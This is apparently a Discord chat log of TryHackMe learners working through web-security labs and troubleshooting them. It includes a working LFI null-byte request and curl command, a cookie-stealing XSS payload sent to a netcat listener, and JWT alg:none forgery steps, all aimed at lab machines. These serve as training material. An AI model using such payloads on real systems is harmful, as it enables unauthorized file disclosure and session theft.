Hey everyone, I'm working on the File Inclusion room and made it to Challenge 3, but I got quite stuck. I looked at some solutions online to figure out what I was missing and many of them referred to using Burp Suite. Burp Suite looks like it's at the end of this path. Is it expected to skip around and come back? I kind of thought the paths would give me the necessary skills as I approached each room instead of having to bounce around.
Hey, I would assume that you were talking about the LFI challenge in Junior Pentesting Room. Using Burp is not mandatory to edit and resend a HTTP request. You can also use "curl" in a CLI or do it directly from the web-browser's developer tools.
Apologies, I meant the File Inclusion Room, Task 8, Challenge, Flag 3
Nonetheless, I'll think about your advice with respect to the challenge. I've had some distance to the problem so maybe I can figure it out properly
Hello Guys
I am enrolled in Web Fundamentals learning path as a Pro User
By the way, I am a Cyber Practitioner and working for a Canadian firm remotely.
Hello everyone, I am at Web Fundamentals path - Room Content discovery, I do not know where to access PowerShell in a virtual machine provided by @nocturne trout
Please guide
Have you done the Pre-Security path? It should get you familiarized with the Windows environment.
Hi
I recently passed the Jr pentester course
and realized that I'm interested in web hacking and maybe Networks and ABSOLUTELY NOT in privEsc
What do I need to do\learn next?
I think what shadow meant was for you to do the Web Fundamentals path.
evidently...
Hi everyone. In Upload Vulnerabilities is it possible to do it on attack box or only personal VM?
It should be possible on both.
For the rce task in the upload vulnerabilities room shell.uploadvulns.thm won't let me upload a file once I've already done so before?
GET /download?server=localhost:8087/admin%23&id=75482342 HTTP/1.1
Working on my SSRF atm.
why is it %23 for the identifier is that just a common identifier used when using burp to modify get requests for files would it just pull all the files for admin with the request?
%23 is the URL encoding for #, which is used to ignore everything in the url that comes after.
That makes sense, added to my new things learnt today cheers dude
hey guys
my /tmp/mount file got bugged, my machine crashed. I can't open it or remove, it just stands on standby for ages. Anyone knows a fix? https://tryhackme.com/r/room/networkservices2 task4
when I do /tmp/mou (press tab) it doesn't complete either, just freezes
rm freezes, sudo rm -rf freezes as well
Hello, I have a ffuf behavior i don't understand. Maybe someone can clarify? In the room authentication bypass, the storyline proposes to pass directly the data (with -d) and the headers (with -H) in the command line. Without a cheatsheet, I dont know which format these should have. So my idea was, intercept the Post message with burp, copy - paste it to a file and use the file (modified) in ffuf with the -request flag. To my surprise this doesn't work correctly. It will populate multiple header entries, and then the match regexp will not match what it is supposed to match unless : (a) I modify the file to only contain a couple of essential headers or (b) use burp as a proxy with the -x param. my point (a) was telling me, maybe some header causes a conflict hence ffuf bugs. but (b) honestly I don't understand why it works. Any insight would be greatly appreciated. Thanks in advance
Hi there! I just completed the "Content Discovery" room and learned about ffuf, dirb, and gobuster. I was wondering if one can use those tools as you please to go interrogating websites, or are there some things to be aware of (that might be common sense to cybersec pros but not to noobs like me)?
I still consider myself as a beginner, but before using any tools or doing active recon on any target, make sure that you have explicit and documented approval from the legitimate site or server owner or authorized personnel.
Thanks! this is good info. I wouldn't have thought of this, and kind of wish the tutorials would mention those things.
There should be a room for it if I remember correctly.
Ah, I haven't made it to that room yet, I'm guessing.
Are you currently subscribed to THM? If not, you may check the PTES (particularly the pre-engagement section).
I am. I'm not sure what you mean by PTES? Is this a room/learning path?
http://webapp.thm/get.php?file=userCV.pdf hi guys , just started file inclusion module . i got confused by the intro which it says that get.php is the file name but the file we are looking for is usercv.pdf instead. can anyone explain to me please ? thanks
If you look at the URL closely, you would see that get.php is vulnerable to file inclusion thus allowing you to see the contents of userCV.pdf.
So get.php is the file for the web app and usercv.pdf is stored inside it ?
userCV.pdf is stored in the web server where get.php is hosted / served from.
Depending on what filters are defined within get.php, you should be able to retrieve files so long as the context within which the web server runs has access to the files at the server.
hello , can someone explain why the url has 4 ../ when the current path is /var/www/html ?
that's a feature related to the way the website operates
it basically implements the cd .. feature
in this case the .. routes refer to the parent element
it's a routing feature
-> that's what seems to be the case from a slight looking, I'm not even dipping deeper
-______
although the basis of my logic is solid, there's a slight chance the mechanism is slightly different
for you to identify the right mechanism, you have to display minor problem solving skills to identify the logic that fits towards said behavior
or the pattern that fits
forming a conjecture of how it works
once the conjecture is thoroughly tested, it can be turned into a PoC of the whole logical sequence behind said behavior
*** I hope I didn't make any typos or semantic mistakes
---_- The senpais here should know better than me though
__========================================
retyping my question:
is there a legit way to bypass TrustedTypes
aside from reversing the createPolicy process
apart from finding out how the createPolicy process is made and trying to reverse it x inject it
is there a legit way ?
back in the trustedTypes github issues there were a lot of cases of bypass and I believe all of them if not most got all remediated
manual bypass
- [ ] Dynamic Bypass as mentioned above ( when I have time, I'll see what I can do )
Hi guys
I wanted to thank all the creators of the Web Fundamentals pathway for this enlightening content and engaging +challenging labs
Especially Muira. His Upload Vulnerabilities Room was awesome, especially the challenge
Just finished DNS in Detail in How the web works & just curious why the second (nonauthoritative) value is the correct answer rather than the first one given.
Also I can't help wondering if the transporter in Star Trek wasn't using HTTP with TCP to "lock on" to whatever was being sent but that's not possible if HTTP was only invented in 89-91 by Mr Berners-Lee & then I remembered that yes! packet switching had been around long before then!
One last question from http in detail - how is it possible that Content-Length is 0 for all of these?
I think because you're PUTting a user and not a file
Path traversal technique, it's not so easy to explain unless you seek out to learn and understand yourself
The /../ is used for traversing or moving around directories or paths and the number of ../ used is determined by how deep in a directory or path you're in and where you're trying to traverse to
Like if you're in the /home/user/desktop directory and you are trying to move to /root directory, then you'll move 2 directories back like so: ../../ and then you'll specify the directory you're moving to, so the final command will be ../../root
I hope this example is helpful to some length
regarding XSS room, I'm a bit confused about the classification of reflected and DOM-based. For example, task 7 level 4, is it considered DOM-based since the javascript sink innerHTML is used to call the input text? However the input is directly reflected in the page source instead of using a JS function as the source like window.location.search, so is it a reflected XSS?
I'm about to tackle the Pickle Rick CTF. Where can I find a general cheat sheet for CTFs on TryHackMe? Thank you very much, and Happy New Year!
I'm not sure if there is one, but there are a lot of cheatsheets you can find using Google. Also, as you work on your methodology, you may have to create your own cheatsheets.
Thanks
i am currently in the Upload Vulnerabilities room and using my own VM. i have edited /etc/hosts as directed in Task 1 but i still cannot access the target servers. i keep getting this google page. please i need some help.
http://java.uploadvulns.thm/
enter this in url bar
thanks a lot, it worked. silly me was not including http:// in the url bar
Thanks @robust spade
lol this is kinda weird
in Web Application / Pentesting
Authentication /Enumeration & Brute Force, no password reset token is valid from 000 to 999. they all have the same response length. is this a bug?
Can you please verify and provide a screenshot?
https://help.tryhackme.com/en/articles/6495858-discord-how-do-i-verify-my-tryhackme-account
Can you share the room link?
would this path be good enough to refresh for a web app security internship?
Finish Web App Pentesting path after this one
This one is pretty basic
is there something broken with the CORS & SOP room? i can't complete the regex task and i'm following it to the T, all i had to change was one thing and the first arbitrary task worked so...? am i doing it wrong?
nvm i figured out the problem
I'm planning to study bug bounty starting with IDOR and SSRF, I wouldn't mind people joining with me
File inclusion room and I'm unable to get the flag3 kindly help
Actually, try without %25. So, just use %00 at the end
Ok
Did that work?
Try to add null payload at the end , also that URL contains way too much / , you need only one
Try:
```
POST /challenges//////////chall3.php?file=welcome HTTP/1.1
Host: 10.10.106.118
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://10.10.106.118/challenges/////////chall3.php
Upgrade-Insecure-Requests: 1
Priority: u=0, i
Content-Type: application/x-www-form-urlencoded
Content-Length: 26

file=../../../etc/flag3%00
```
Btw, the Content-* headers are important, and %2500 won't work as the site doesn't support double decoding (as most modern PHP setups don't).
I would correct it to /challenges/chall3.php?file=../../../../../../../flag3%00
There are too many / after challenges in that URL
It should even work without ?file=
This works as well (curl method):
```
$ lfi=$(printf '../../../../../../etc/flag3' | yq -r @uri) ; curl -v --trace-ascii - -d file=${lfi}%00 -H "Content-Type: application/x-www-form-urlencoded" http://10.10.189.167/challenges/chall3.php --output -
Warning: --trace-ascii overrides an earlier trace/verbose option
== Info: Trying 10.10.189.167:80...
== Info: Connected to 10.10.189.167 (10.10.189.167) port 80
== Info: using HTTP/1.x
=> Send header, 168 bytes (0xa8)
0000: POST /challenges/chall3.php HTTP/1.1
0026: Host: 10.10.189.167
003b: User-Agent: curl/8.13.0
0054: Accept: */*
0061: Content-Type: application/x-www-form-urlencoded
0092: Content-Length: 49
00a6:
=> Send data, 49 bytes (0x31)
0000: file=..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fflag3%00
== Info: upload completely sent off: 49 bytes
<= Recv header, 17 bytes (0x11)
0000: HTTP/1.1 200 OK
```
I don't know what mistakes I'm making here
You are missing the Content-Type header
Even still not working bro
show pls
your content-type header is incomplete
should be
Content-Type: application/x-www-form-urlencoded
Content-type should be 1 line, not 2
URL is wrong
delete all those / after challenge3
also you don't need file parameter in URL since this is a POST request you can have it in body
Btw, your "Like this" screenshot was missing etc/ in the file path. It would've worked otherwise
I'm referring to the screenshot before that
@molten ibex This is as close as possible to the request you had before and shows that it works:
You still have /// use just /
Yeah, that content-type header is really important
And true you have too many slashes (/) and no need to have ?file= in the POST url, but it will still work regardless.
so im not sure if this is where i go for this, but i am currently very stuck in this project. Am I doing something wrong with the string?
You're printing fixed Text "... included shipping is 52.8" and then just adding the basket cost to it which is wrong
also you mentioned that the customer_basket_cost is 34 again in your if/else statement, which is a duplicate, since you already have the variable set above
Instead you should update the basket cost with the shipping cost and then just print the basket cost
understood, thank you
so in the OWASP API Security Top 10 - 1 room
the question
this is the response I am getting
nvm
mb
Hi everyone, I need help with passing a task in SQL Injection room
Hey Im starting the Walking an application room for web fundamentals, I've launched the machine but the URL it wants me to go to isn't loading at all
nvm
burp make it look easy
hi all,
I'm doing IDOR section and currently stuck at task 7
i'm supposed to change the value of id to 1,2 or 3 instead of 50 in customer?id=50
went to Network --> clicked on said path --> Response --> right-clicked on 50 and chose "Override Content" --> saved file in Documents
now i'm refreshing the page but nothing is happening
I know i'm deffo doing it wrong, but what am i missing ?
dont' want to do it with any other tools other than Chrome
appreciate your help/tips in advance!
=======================================
I just copied the Request URL and pasted it in the address bar and changed id to 1, and it gave me what i wanted
would love knowing other methods as well
found another way: Firefox (Edit and Send)
can i DM someone for the LFI challenges ?
What is the issue ?
Challenge 1:
I changed GET to POST and went on trial and error but nothing is happening
no errors at all to indicate anything
Challenge 2:
changed THM to admin (made sure it was small case because "Admin" gives an error)
so i think from here, it's only also trial and error but nothing is happening either
How did you change the method ?
from Firefox
Network tab
right-click on "Edit and resend"
one moment, i'm re-opening the box now
even tried it with Burp Suite, but still nothing
alright, i'm in the box now
it seems that i can't send screenshots in here
so i change GET to POST in Network tab
and add the file traversal in the url; like so (this is for challenge 1):
http://10.10.138.81/challenges/chall1.php?file=../../../../etc/flag1
the response is still the same, nothing new happens
by any chance, is there something wrong with the challenges ?
or am i doing something wrong or missing something ?
No , there isn't I went through the challenge last week and it works perfectly fine , provide some screenshots of what you're doing
i can't send screenshots
are new users unable to send screenshots ?
managed to do challenge 2
You need to verify in order to upload screenshots
done!
thank you
so
for challenge 1
writing anything in File Name doesn't bear any fruit
changing GET to POST (via Burp Suite) and sending it manages to get a 200 OK response.
but i notice that the form action method is always GET; like so:
the form action, is it relevant ?
yes!
it is relevant, i've been changing it in the wrong place!
managed to solve challenge 3 for LFI, but i have a question in it
why did it work with curl and not in the browser ?
changed GET to POST in <form action= ".//chall3.php" method="GET"> (this is when i realised that the filter stops working when we change the method to POST)
but still, in File Name in the browser, whenever i input ../../../../etc/flag3%00, it still showed the error and nothing new was taking place
but when i tried it with curl (here is the command: curl http://10.10.3.176/challenges/chall3.php -X POST -d 'file=../../../../etc/flag3%00' --output /root/Desktop/flag3.txt)
it worked just fine
so definitely i was doing something wrong in the browser or missing something
i was using Firefox btw
Burp Suite was a deadend to me (not sure either if i was doing something wrong in it)
Hello there,
having trouble with https://tryhackme.com/room/xss
final task, i created a listener with nc -nlvp 9001 and injected the following payload in the support ticket:
</textarea><script>fetch('http://0.0.0.0:9001?cookie=' + btoa(document.cookie) );</script>
been waiting for more than 15 mins and nothing is happening
i can't pinpoint what is wrong here, would appreciate additional eyes
no one from the mods seems to care responding, i see
Mods are volunteers , they're here to moderate the conversation on server not to help with room problems
Change that 0.0.0.0 ip to the actual ip of your attackbox
duly noted, apologies
thx, will give it a go now
Also this is a global server , there's a high chance that many people are from a different time zone than you
you're right
i was a bit frustrated with having no responses
sorry again
Hi, I'm doing the "Blog" challenge room to test my learnings from this path. I think I'm doing pretty good so far (went down the rabbit hole) and got the creds for one of the users, now I want to use metasploit with the "multi/http/wp_crop_rce" exploit. It seems to work first but then the remote session dies (screenshot), am I missing something? I took a look at the writeups after a while but they did the same as I did
Did you put in a port as part of the options? It was on ||9000|| if I remember correctly.
Ahh that makes sense i used the default 4444 metasploit port
Ok, it worked after Changing LPORT to 9000
I want a dedicated path to build career in Android and IOS penetration testing
There's no such path on THM yet, however you can suggest it in #room-ideas or #feedback-and-ideas channels
If I learn Web-Application Attacks(intermediate) will this also help me Android pentesting?
Yeah it will help but you will also need to learn some stuff related to Android environment like Android studio , etc.
hi all,
i'm having an issue with Task 20 in owasptop102021, also in web-hacking-1
I login as guest with password guest as well.
I get the JWT token, remove the signature and modify the header with 'none' and the payload with 'admin'.
I refresh the page but it keeps giving out 'Either the token or its signatrue is invalid, no flag for you'.
I'm pretty sure that everything is right.
Can you decode it in cyberchef and send us that screenshot please?
i managed to pinpoint my mistake:
apparently when you modify the jwt token and remove the signature, you have to leave a dot right after the payload
so that did it
im trying to complete this web fundament path so guys help me ..........
where are you stuck in the path ?
I'm new to cyber security
Almost everything!! I do start one path, getting frustrated
you will have to be more precise
When I planned to start a path for network labs in THM, I do get tired of finding vulnerability in the lab, I can't find even the easy one, it's getting me frustrated and I leave the lab .....
Why doesn't burp intercept the js file so i can edit it ?
Trying to follow along here
https://tryhackme.com/room/uploadvulns
Disable interceptor
I have a valid token from a vulnerable endpoint and need to pass it to /apirule2/user/details
How would I do that in Talend API Tester?
... It wasn't Authorization, it was
Can you advise which THM room is this from so folks who want to help would have an idea where this came from?
Honestly I don't know if I missed something in front of my eyes or not, but fiddling around for an hour~ I finally figured it out. As far as I can tell "Authorization-token" as a header is not common or standard, hence why "Authorization" is the only one that autocomplete in Talend API tester. Then again I'm the noob here, so I could be very wrong.
The hint given is "Get a valid token from a vulnerable endpoint and pass it to /apirule2/user/details." and was, at least for me, no help at all as the hint was the most obvious part to solving this.
Please let me know how and where I should have figured out to use "Authorization-token" if anyone have the time to look at it. If not then meh, it was an annoying hour, but I solved it and have now moved on, but I'm always open to learning if there was something I missed.
https://tryhackme.com/room/owaspapisecuritytop105w
Task 4 - Vulnerability II - Broken User Authentication (BUA)
To which country does sales@mht.com belong?
hello i have a issue in the Task 5 https://tryhackme.com/room/owaspjuiceshop the flag doesnt work
question 3
I resolved that
Hello, currently in the owasp juice shop module and stuck on the 2nd question. I've followed the steps as explained but am unable to get the xss to trigger.
Can you provide some shots ?
i can't go through the OWASP juice shop XSS persistent injection
I add the header when I logout
but then I log in and go to check my IP, which is still the same and not an xss injection
can someone help me ?
Someone else probably already done that, I think you'd have to wait till it resets
what ?
i genuinely didn't understand what you meant by that
Are u running it thru website? If so other people will access the website too
If u run it on a docker for example you could solve all the tasks without other people involving
"Meterpreter session 1 closed. Reason: Died". I had problem to establish meterpreter session that was closed down after few seconds. That's the exercise generated for Metasploit: Exploitation - Task 6 Msfvenom. Any advice or suggestion is appreciated.
Can you please verify and provide some shots of your metasploit options?
Someone having connection problem in the Uploadvulns room @nocturne trout help
did you edit /etc/hosts as instructed in room material?
Yes, even editing and I also tested it on Attackbox
do you have a situation similar to reported here, i. e. sometimes the room does not work, and then does a bit later?:
I'll test it again and if it doesn't work I'll forward an email, thank you
Gave +1 Rep to @halcyon imp (current: #13 - 810)
apparently it returned to normal, but I sent an email before with the error
thanks for the feedback
I have experienced the same: not working 10-15 minutes ago, working now
Gave +1 Rep to @mint wedge (current: #3157 - 1)
Y m not seein' the file main-es2015.js
it's main.js, you just find "admin" and you'll see
guys, i get into trouble in Upload Vulnerabilities room: https://tryhackme.com/room/uploadvulns
i've followed instructions and tried to edit the hosts, i still can't access the webpage,
i also do that on attacking machine but got stuck
Can anyone who completed this room give me some advice please?
thnx man But i did it before
Have u reached upload vuln room yet?
I'm stuck at editing the hosts file
Not yet jus started
Pls lemme know if you can configure the host
Ok lemme see
@crystal flower Hey u done or still stuck
Stuck
Should I call XSS, http parameter pollution?! Or is this a true name for the vulnerability because I believe it perfectly aligns to the cause of vulnerability!!
No those are two pretty different things
@sacred dome how come?
Because they're very different in nature . They're completely different types of vulns. XSS is usually a client-side vuln. while HTTP parameter pollution is a server-side vuln.
But what I have learnt so far is that XSS is a vulnerability that initiates from client-side that impacts the server as in a way of corrupted or malicious request, so I believe saying it a parameter pollution would be same in nature and for this notion I am referring to the chapter 12 of the book "real world bug hunting", if you think this is not the case, then how should I think of it?
welcome
no?
Try #general
Yeah bro
Hi. I'm trying to complete the web fundamentals OWASP Juice Shop, whenever I type in the codes, it keeps coming up as incorrect even though it's correct saying "The answer you provided may not be in English". Any suggestions?
can anyone tell me why the OWASP Juice shop room images all show this. Im from the UK.
is that for all parts of the room, like all tasks?
the picture seems to be hosted in imgur.com, which is no longer available in the UK as per screenshot
reported yesterday here: #1422647718374936676 message
dammit, yeah all parts of the room are like that. It's really annoying. I can't get task 7 XSS to produce the flag. I thought maybe there was something in the images that I was missing.
@halcyon imp thanks for the reply.
Gave +1 Rep to @halcyon imp (current: #9 - 958)
So i use <iframe src="javascript:alert('xss')"> in the search bar as instructed. The alert appears on screen, but no flag appears.
same happens on task 8 with True-Client-IP header set and <iframe src="javascript:alert('xss')"> set as the value as instructed, burp intercept on. Resend request. Log in and view last login IP as instructed. Again, no flag appears.
you can search THM Discord for Juice Shop: lots of user have complained for several areas of that room, and I am afraid you will not have a pleasant time in that room regardless of the imgur issue
@halcyon imp Yeah ive noticed the complaints after having a dig around discord. Kind of sucks considering I need to finish it to complete the web fundamentals path. I dont want to leave a room unfinished.
that room will not get repaired overnight
one suggestion: Juice Shop is available with Kali here: https://www.kali.org/tools/juice-shop/
I have not used it, and I cannot say if the issues seen with THM room are absent with the Kali install
but if you can do the tasks somehow, you can consider you have covered the room material; you then have the option of searching the Internet for some writeups containing the flags, and that way you can finish that room and path
I have 3 tasks left in the room which are pretty simple and I know how to do them. The flags just wont appear for them. I have already had a dig around for writeups last night after 2 hours of trying to get the flags. All the write ups are old. The instructions in the write ups are the exact same as they are in the room. The flags are old though.
@halcyon imp appreciate the replies.
Did you check the scorecard? I was able to get the flags that weren't appearing from there
Hi can anyone help me i am stuck
If you describe where you are stuck and the room, folks will surely help out.
I am currently stuck on question #2, perform a persistent XSS! and question #3, perform a reflected XSS from the task "Where did that come from". It appears that the reason for my inability to complete these two questions successfully may be due to using Caido instead of Burpsuite to undertake the work of the proxy. Is there anyone out there who is currently using Caido on either of these two tasks? I would use Burpsuite but I find Caido a much better application and up until now it has been working perfectly.
Guys...can someone help me...the system keeps saying that my answer is wrong in owasp juice shop injection attack, I know my answer is correct, I've checked it with YouTube also, I've completed 96% of the path and I'm stuck here
Help me decide to focus on learning web development first, because I often get confused when studying cybersecurity and application security
What field are you looking at down the line? If your interest is on application security, learning coding or development will certainly be helpful
Hi everyone, so I have tried this morning to complete the upload vulnerabilities room in try hack me and I have done to the letter everything task 1 has asked me to do, even going as far as completing the Networking room they suggest you complete before commencing this task and I have also added the lines suggested, including the correct IP address to the /etc/hosts file in nano and saved that correctly but it still will not let me connect to the machine. Am I missing something here?
What attack machine are you using - Attackbox or local VM (kali, parrot, arch, etc.)?
Hi, well I have used both my own VM and the attack box. When I have used my own VM the page it takes me to is a google search page which contains lots of articles about the actual room I am doing. When I try to connect using the Attack Box I have referred to a page which states that I need to read task one and connect to one of the several domains which I have configured the /etc/hosts file with.
Hi sorry, for reference I am running kali linux on my own VM.
The irony I suppose is the instructions you are provided with in task one where we are told that Discord users reserve the right to ignore anyone who skips over the instructions and then cannot connect. I have read, understood and carried out exactly the instructions I was given and I still cannot connect. I am wondering if they have left something out of the instructions. I have been meticulous in configuring the /etc/hosts file as per the instructions on each occasion.
Well I never! I have been adding the domains (together with the IP address of the vulnerable machine) to the end of the /etc/hosts file which is what we are told in the instructions, and I quote "Add the following line in at the end of the file:" is what the instructions state. I have just decided to insert the line after the local host address and before the IPV6 configuration lines and I have successfully connected. Anyone out there who has had the same issues as me may need to re-configure the /etc/hosts file in the same way. Although I am amazed as to why it should actually matter where in the file it actually goes and would have thought that so long as the line is correct it could go at the end, (as per the instructions) or anywhere else.
I've put the added in all sorts of areas in the file and still not connected. It's a shame, it's the last thing I have to do now and I don't want to revert to getting the answers from YouTube because I can't get it to work. :( EDIT - today I tried and it just worked
Hi guys,
I'm working on SQL Injection room Task 7. I was wondering if there's a method to automate the '%' cycle to find the correct database name? Without manually trying each alphabet, number, and symbol one by one.
Hi guys, I'm facing the same issue since yesterday night. The first time it worked without any trouble for me with adding hosts mapping to /etc/hosts. But since yesterday night I'm trying to do the same thing but I cannot connect to the vhosts. When I ping annex.uploadvulns.thm I get a response from overwrite.uploadvulns.thm, but I cannot access to overwrite.uploadvulns.thm . I tried to shutdown the vulnerable machine and my attackbox and edit again /etc/hosts but still get same problem.
hi bro! I've had the same issue since the Cloudflare problems on the upload vulnerability room, I think it's the same room that you've encountered problems with
even if we add IP and all the vhosts in the /etc/hosts file, we can't acces to the vhosts, just the first page and that's all...
I think we must wait a little bit
Yes I'm on the upload vulnerability room. Ok thanks for you feedback, let's wait then
Gave +1 Rep to @mint ibex (current: #3265 - 1)
if the issue is still the same until tomorrow I will contact the support team to have more information
keep me in touch bro
it's up brother, if u want to continue ur hacking training day
guys, has anyone done Pickle rick challenge, thm won't pick up the flag for question 1 even though i viewed the file like 100 times
have u restart vm ? if u don't try it, sometimes it works
i have restarted it and did the task again, still nothing happened
if someone morrocan here
anyone else have issues with burp browser just in eternal limbo when trying to open a url on the attackbox? Going directly to firefox works fine with the same url. I'm in the exploiting race conditions room for reference. Will probably just come back to this room later on in my journey
I've been having the same issue for the race conditions room as well. I've been trying to figure it out for the last 2 days with no luck. If you figure it out man, please let me know.
just to be 100% sure, is Intercept activated or deactivated when trying to access the site via burp browser?
since if activated the request will hang in the proxy until you forward it. Eternal limbo
That makes sense. So in other words, keep deactivated until the page is loaded, then activate and refresh webpage for burp to capture?
Or activate before hitting login when trying to capture login attempt?
exactly. Everytime it's activated all requests will get stuck within Burp for you to edit and/or forward.
Even if it's deactivated you will be able to scroll through the browsing traffic/history in Proxy > HTTP history. Convenient if you realise you wanted an older request or so to read/manipulate/resend
Thank you I appreciate it
Pls am looking for a cyber security mentor,am in need of someone to work with,help while growing myself
@brave fox @lavish loom amazing! Thanks friends! I haven't tested it yet, but thank you for prompting this a little more and giving things to explore and think about. Little busy today and prioritizing the advent calendar lol, but will get to it soon
Gave +1 Rep to @brave fox (current: #440 - 17)
Gave +1 Rep to @lavish loom (current: #2188 - 2)
I'm having issues with Burp Suite in the OWASP Juice Shop module. I'm able to get all the way to the point where you start the attack in Task # 4.
Once I start the attack and it goes to the part where I'm supposed to filter out, I get a notification stating that burp suite community is limited and just shows a preview. If I push okay, or the x to exit notification, I'm unable to do anything at all to even be able to complete the room.
Any help or direction with this would be highly appreciated. If I need to go through the tasks and supply screenshots, let me know and I'll DM.
I'm also trying to complete the task through the AttackBox. If that makes a difference, let me know lol.
Is this the Spider feature?
#junior-pentester-path Penetration-Tester
Interested
I can help you with that
@nocturne trout I'm finding it difficult connecting via RDP ,I don't know the computer name I ought to use in Active Directory basics under Managing Users in AD
@royal flower here it seems very common
no fixes? damn
Lets use the search bar to search for a solution here
No solution, @royal flower .
everyone was happy with doing ts in the browser lol

Yeah most likely
Hi, has anyone recently done the RCE section in the upload vulnerabilities room?
It says to navigate to shell.uploadvulns.thm but when I try to load that page I get an error saying this site can't be reached.
Am I missing something?
done
Were you able to access this now?
Yes. There were instructions about DNS configs on a local file which I had missed.
Hi @nocturne trout & @limber sable ,
I am not getting the desired page for solving the room Upload Vulnerabilities . Can you help me with it?
Issue: i am not able to visit the vhosts provided for solving the room. And is getting the default page as show in the snapshots.
target the Ip 10.10.123.45
Edit the Hosts File with Linux
sudo nano /etc/hosts
Add the vhosts given in the room, for example:
10.10.123.45 uploadvulns.thm
10.10.123.45 admin.uploadvulns.thm
10.10.123.45 shell.uploadvulns.thm
Hi guys, i have challenge here i have no idea how to differentiate between a failed and successful logins on the web application?
Which THM room is this?
Challenge room after molly room
Hi everyone, I just finished the Web Fundamentals path and I'd like to try some CTFs to test what I've learned. Do you have any recommendations?
I was browsing the list of CTFs, but they seem to cover a wide range of topics, so I'm not sure where to start
Just try to pick the easy ones and go from there. You may need to look at a few write ups as you work on a first few boxes.
I'd recommend doing the web app pentesting path first as they cover more realistic scenarios that'll help you tremendously in CTFs
Hello everyone, i started with Web Fundamentals Path, I have fundamental knowledge of OS, Networking, Web Development. So if anyone interested we can connect and complete this path and then move on to get some real world experience through CTFs, BBP/VDP.
Github
??
Is that really You dont know about github
Hey everyone,
I'm stuck on File Inclusion - Local File Inclusion (LFI Continued), specifically Question #1 for Lab #3.
The question asks: "Give Lab #3 a try to read /etc/passwd. What is the request look like?"
I know we need to use the Null Byte to bypass the .php appending, but the answer box keeps rejecting my input or cuts it off.
I've tried:
/lab3.php?lang=../../../../../../etc/passwd%00
/lab3.php?lang=../../../../../etc/passwd%00
/lab3.php?lang=../../../../../../etc/passwd/
But none are being accepted. The input field seems to truncate the %00 part.
Has anyone recently completed Lab #3? What exact string did you submit for the request URI?
Any help would be appreciated!
Thanks in advance.
correct encoding is always a thing. i did it some time ago, but my memory ain't the best anymore. sometimes the ../ gets filtered out, so you have to double it.
please correct me, was it like ....// ???
Web Fundamentals learning path 
https://tryhackme.com/path-action/web/join
The aim of this path is to teach you how to attack web applications. To successfully attack and exploit web applications, you need to understand how they work.
The first section (Web Fundamentals) will give you all the pre-requisite knowledge on this.
The second section (Security Tools) focuses on learning how to use Industry Standard tooling to interact with your targets.
The third section (Vulnerabilities) covers various vulnerabilities found in web applications today. This section will go over root causes of these vulnerabilities and give you hands on experience on exploiting them.
The final section (Practise Makes Perfect) will help you apply what you've learnt in previous sections.
After completing this path, you should be able to:
- understand how web applications work
- utilise industry standard tooling when attacking web applications
- explain and exploit common web vulnerabilities
- apply this knowledge to other targets (be it within an interview or a professional web applications security assessment)
:) 
hi
LFI
Understand and exploit a web server that is vulnerable to the Local File Inclusion (LFI) vulnerability.
Getting user access via LFI
What is the user flag?
not sure why it is asking password
I tried to edit the ssh key in the text editor. I guess that's not what I am supposed to do
please advise
ssh key must have special permissions, so set those permissions and you are good to go. ( i haven't done this room, so it could be something else too).
@molten stag Is this for a THM room in the Web Fundamentals path?
i am sorry if i posted in wrong section
but this one looks close
This channel is for the THM Web Fundamentals path.
ok then i am sorry
hey, I am stuck on the introduction to Django Unit 3:
First I run django-admin startproject djangotest to create a project.
Then enter folder:cd djangotest
Then I create an app with python manage.py startapp testapp
Then I run cd djangotest again to go to a subfolder with the same name as the top folder.
Here I open settings.py and change the list INSTALLED_APPS to
```
INSTALLED_APPS = [
    'testapp',
    'django.contrib.admin',
    'django.contrib.auth',
    'django.contrib.contenttypes',
    'django.contrib.sessions',
    'django.contrib.messages',
    'django.contrib.staticfiles',
]
```
Then I go to urls.py in the same folder and change it to
```
from django.contrib import admin
from django.urls import path, include

urlpatterns = [
    path('testapp', include('testapp.urls')),
    path('admin/', admin.site.urls),
]
```
Then I go back up to the top folder and try to run python3 migrate.py migrate
but I get this error
ModuleNotFoundError: No module named 'testapp.urls'
anybody know what's up with this?
I faced the same error. Apparently you need to add a urls.py to the app as well. Otherwise you get that error.
I followed the steps here > https://docs.djangoproject.com/en/2.2/intro/tutorial01/
thanks, will check it out!
Hi, someone lately done room ? ZTH: Obscure Web Vulns
i'm stuck on JWT challenge
3.5
generating header with alg:none
payload changed to admin
no signature
put into cookie and reloaded page, but that just throws me to login with error authentication failed
not sure what i'm doing wrong
I just did ZTH 3 earlier, will do 3.5 later today. I got stuck for a while because I didn't realize the payload portion changed with a new JWT
I ran into the same issue, I was forgetting the final period and to remove the '='s after I re-encoded. Also it seemed to crash the web server sometimes and I had to restart the box to get it going again, which meant I had to re-create my payload.
Got it done in quite good time. Really good path, it helped me alot, thanks!
Hi, I am a newbie, I am doing Django CTF and i am having a doubt, that, why the username and password given are not working for admin login but working for SSH login via terminal ? thank you
They're for different services
Hi @orchid hazel , thank you for your response. I am provided with these credentials "Username: django-admin Password: roottoor1212" but its not mentioned that they are for django admin, and in all the 5 units SSH is never mentioned, so i was confused what to do with this credentials. So searching for hints online, i found we have to use SSH to get into the server first. Is it that the details given are for SSH but not admin ? and The credentials for SSH and admin will be different ? thank you so much.
Gave +1 Rep to @orchid hazel
hello
not really understand where I am going wrong with install
tried both,
no luck
yo! I got a sort of fundamentals question. Im working on the UploadVulns room and it sets you up with a list of subdomains for your target IP. I was wondering, are all those subdomains on the same box? Like is the IP im using doing some kind of DNS to those domains?
No, /etc/hosts is doing all the DNS like things
They're VHOSTs
Oh duh, of course. It's literally a list of names.
The mechanism sending you to the different sites is VHOSTs
There's a bunch of docker containers, with one running a reverse proxy that directs you to the correct one based on the Host: header
The flags being in the same www web root on different virtual hosts is trippin me out tho
Separate container for each webapp
Ah ok, docker containers
Yee, it's super neat how it all works
Thanks, and its all hosted on aws it looks like
THM rooms all are
Ah ok, I hadnt looked before this room
It's fairly inconsequential
The host file was what interested me
Hi, I may have a problem with the XSS room (https://tryhackme.com/room/xss).
I'm at the 8th task "Filter Evasion". I can trigger a "Hello" alert with my payload but I don't receive the flag afterwards.
Should I write the payload I used here ?
